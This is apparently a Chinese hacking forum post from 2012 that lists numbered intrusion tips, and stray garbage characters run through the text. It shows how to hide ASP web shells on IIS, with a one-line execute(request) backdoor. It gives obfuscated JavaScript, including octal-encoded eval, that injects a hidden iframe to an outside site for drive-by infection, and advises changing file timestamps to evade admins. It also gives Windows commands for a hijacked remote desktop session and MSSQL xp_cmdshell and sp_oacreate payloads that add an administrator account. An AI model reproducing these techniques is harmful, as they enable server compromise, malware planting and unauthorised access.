8 \: q7 z6 E* C$ F' n5 Y执行后可以用AT命令查看新加的任务
a* s6 V u! F& M2 d) r; d用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
: J9 e; w Z9 i& p4 Q) Q6 X5 x% s& g; a' s& T) ~: ^0 O
53、隐藏ASP后门的两种方法
' m4 |8 r5 T5 ]' z3 v/ F1、建立非标准目录:mkdir images..\) s$ Q1 O! j3 [; k7 ]
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp' O3 _* e! ~) [6 @6 w
通过web访问ASP木马:http://ip/images../news.asp?action=login
7 \0 x X* U- G/ q6 M& Q) R如何删除非标准目录:rmdir images..\ /s
# j8 ?& }1 Z w# T, N0 F8 B2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
+ V" p7 i# f% {' b, z1 pmkdir programme.asp
# a0 V9 Y0 T' K; }新建1.txt文件内容:<!--#include file=”12.jpg”-->
/ w6 v4 v) H6 j2 j' D" t# R新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
m+ M" U+ X7 ]9 o& N% ^+ F+ a* xattrib +H +S programme.asp9 P8 I: x. k+ c9 \7 {
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 k; I4 G! G F4 d. @
1 l, @, D( W0 \$ y54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! n( o% ^3 b" _4 o8 q( Y& P, j
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
' D; [; Q+ F4 r. S! h9 Q8 _0 G
" b0 s$ q; [$ Q! X55、JS隐蔽挂马
7 c; C# K4 f# R! v$ `* _1.
7 U0 V' [6 ~8 B1 G1 w/ ?# d9 |9 J7 Q, ivar tr4c3="<iframe src=ht";/ ?* B2 u/ o- ~% @8 R
tr4c3 = tr4c3+"tp:/";
4 Y, g2 g) I6 v' j, ^" xtr4c3 = tr4c3+"/ww";
! N2 I) _3 q7 [( D5 Dtr4c3 = tr4c3+"w.tr4";
; z' _8 ?" {; o) u9 O7 ytr4c3 = tr4c3+"c3.com/inc/m";
" }# \9 t3 ]2 w) x( W6 t/ i( Z ltr4c3 = tr4c3+"m.htm style="display:none"></i";' a1 \& h% F& B5 z
tr4c3 =tr4c3+"frame>'";+ J- |2 Q5 e- e, Y; D3 B# A
document.write(tr4c3);
$ j5 B5 Y+ Q7 l6 V& \避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ Z+ S2 X% g6 b" _
# p8 o; a( J4 l8 V0 z; _2.
3 M3 Y! U2 @# X( [2 |8 G转换进制,然后用EVAL执行。如1 j8 G+ c1 I* Y+ j6 m- ~0 N
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
! M, ?8 M+ z8 V$ p7 {不过这个有点显眼。- N' L# u+ a: ]+ p' P7 F
3.
: n6 \( I6 U' V$ {9 X$ U4 I* I _document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');2 S0 c! }. f1 |3 `" z5 [, g. `
最后一点,别忘了把文件的时间也修改下。
) X- F+ q$ F1 b# @8 K3 v
$ F5 ?5 |2 ^0 w) D56.3389终端入侵常用DOS命令+ O" Z. e: p4 ~- Y7 e; \
taskkill taskkill /PID 1248 /t) j2 W# y; v3 x& `& t o3 y
! y/ Y$ r0 k' Ttasklist 查进程. P/ Z- }( p5 b1 y0 p
* V, @4 }% ]1 E
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* b/ n3 u9 Q( l# i; Z( J4 b! a
iisreset /reboot& w+ ?9 \1 e8 Z# R
tsshutdn /reboot /delay:1 重起服务器! ^" u! ]3 M. Q/ S D
9 w/ X; Q5 R- D+ Vlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
; B3 {0 k8 b5 D; o& S3 c1 ]# c3 G1 p1 i
query user 查看当前终端用户在线情况
; V* ]; \& A& y( X4 A
; X( m- T/ l* k# E' V: ?4 A5 l1 R要显示有关所有会话使用的进程的信息,请键入:query process *! |: y. U4 b$ m& E# q" e
' w* A1 r0 w- X7 v; h( [: V要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2) W( Q. `* c w+ d9 o* B
( u+ \' Y& }3 }: t% [( C; ]0 i8 {要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& I8 j% r# y4 A, c
3 ]# W7 n9 v7 b' X7 O要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" U; t0 k7 c* i* M2 k1 n6 \0 Z; n2 R, a1 F& H& J" _ S
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 d' a( U3 z. I2 t4 W0 Q
+ }1 w0 _$ @4 z& S! z2 _命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统% I6 i" ^$ H) a" |' Y
, ]: a4 ]1 \- ^8 N6 q! U命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。3 d# C) {& W! H; L# b( f
2 o I4 N) s3 ?& A+ C命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
7 }6 Q' R: G8 p5 l+ V6 v* w& [8 T9 Q4 K
56、在地址栏或按Ctrl+O,输入:# [5 k1 z7 b. F5 y( H
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
" H. c" E5 B7 G" |/ X& w7 @: @+ x, k
! b1 t& Q) v+ F8 p- z ?, E源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
$ U7 O; W/ \/ l0 w# W
2 l2 Y- v6 ] r7 i( |8 X N0 u57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
2 M, {$ @4 F, b0 G: g7 ^7 C. ^用net localgroup administrators是可以看到管理组下,加了$的用户的。% I; y2 G3 `6 ~, D2 D0 ]" \7 c. t2 W
) ]2 }9 H& ~1 c& |& ^$ A
58、 sa弱口令相关命令
0 p- w, ~$ \. k. t
# O6 o) i/ D* b) Z8 K$ s' d一.更改sa口令方法:
0 \9 P' x# P8 H! I f) K用sql综合利用工具连接后,执行命令:. _( H1 g4 P. z. {6 Y1 G' S
exec sp_password NULL,'20001001','sa'
+ M6 H. h& L. C6 S. U(提示:慎用!)
" W0 {; R, F7 `
: G8 g6 f' L% e* |2 b: t二.简单修补sa弱口令. k0 U9 W" g6 ?
0 j2 p1 C E# _. _8 y
方法1:查询分离器连接后执行:
- e2 n( x `8 X3 _3 a( u% v, e% ?6 eif exists (select * from+ H3 e! b' O% M* b K
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and2 Z# k: O2 t' v. |5 i
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
+ ]' w% ]4 N: [
( l( y! B* M0 \; bexec sp_dropextendedproc N'[dbo].[xp_cmdshell]', T, z" S7 F! ?' C3 E$ @3 V" s/ G
6 {) u5 |1 v1 T" LGO
6 L4 ]/ u, ~! m4 m& w& J3 C1 K3 @* b: ~* ? g0 Q, F
然后按F5键命令执行完毕
" u( X! t" \. r+ ? c M1 |3 J1 b; b4 p: {' E: i; i/ _3 h
方法2:查询分离器连接后
3 X7 x- K3 U, x; C$ X- @9 Y第一步执行:use master6 y: r! M$ r) ^6 ]( O
第二步执行:sp_dropextendedproc 'xp_cmdshell'
" v7 U1 U: @+ ]& L. e然后按F5键命令执行完毕5 D. G+ z# @: @" H1 C P! G/ N
' d0 d9 P: v* j% \# g N
; G# t3 \/ ^2 e+ d
三.常见情况恢复执行xp_cmdshell.
! P" k- [+ w. M" [* W& ^) y6 c1 e* q8 b8 h$ f' c5 }
& p2 W. N# `5 s8 H( \1 未能找到存储过程'master..xpcmdshell'.
6 S# v, y# q/ p/ e- `: ]% U2 O 恢复方法:查询分离器连接后,3 s) W! a6 T4 B8 T3 `* Z3 ^
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int3 u2 f! b* R6 k' F+ n
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') ^/ f. O+ k8 t
然后按F5键命令执行完毕
0 [$ @- S' F8 `, Z6 B* K" S. i
& w5 y; V, |% w, e' L7 Q. g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 l- d h' i' @2 ^: S恢复方法:查询分离器连接后,
3 p: e4 P$ ^& }: x w Y第一步执行:sp_dropextendedproc "xp_cmdshell"
& o) [5 {) l+ D第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& j# A6 o- x. P# g3 V
然后按F5键命令执行完毕 ?+ D' [ ^/ H# N) \, ?
- d) d C5 B" K- y2 {
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): I8 ?! P8 h& c* \
恢复方法:查询分离器连接后,1 ]& C C7 a; S/ n9 F" X
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
* F) B# F+ S0 p+ m第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
! q' d4 h' p: y' ]& h6 }然后按F5键命令执行完毕
2 j; Y3 F0 o6 S0 ~$ g- f7 J6 w
8 e V2 u$ h4 Z四.终极方法.1 M1 b% k) i, K/ H
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& H: R2 @; K) H! F4 I' Z3 L查询分离器连接后,& P! C* f( T# Q0 I+ `# ?
2000servser系统:
% [" z2 Q8 x) j2 M' w% edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'/ {) K' h k" Q+ l
! X6 I+ s0 a5 K' }& ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
0 u" F; D1 |2 U# c/ x/ n2 {2 i9 Q5 L& y; i$ _" A& R) y O7 L
xp或2003server系统:
: i2 s4 ~- b; ~# E+ J+ T- E4 L
3 ?: Z- A0 R% |8 s- n3 sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" d- h; [1 d; _5 n! T/ y& J% r
. k H$ J& Y$ M: j, I1 Q, R5 Z0 D3 Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
; C. I+ J5 |* t# ^! |: G |
发表于 2012-9-15 14:13:15
收藏
支持
反对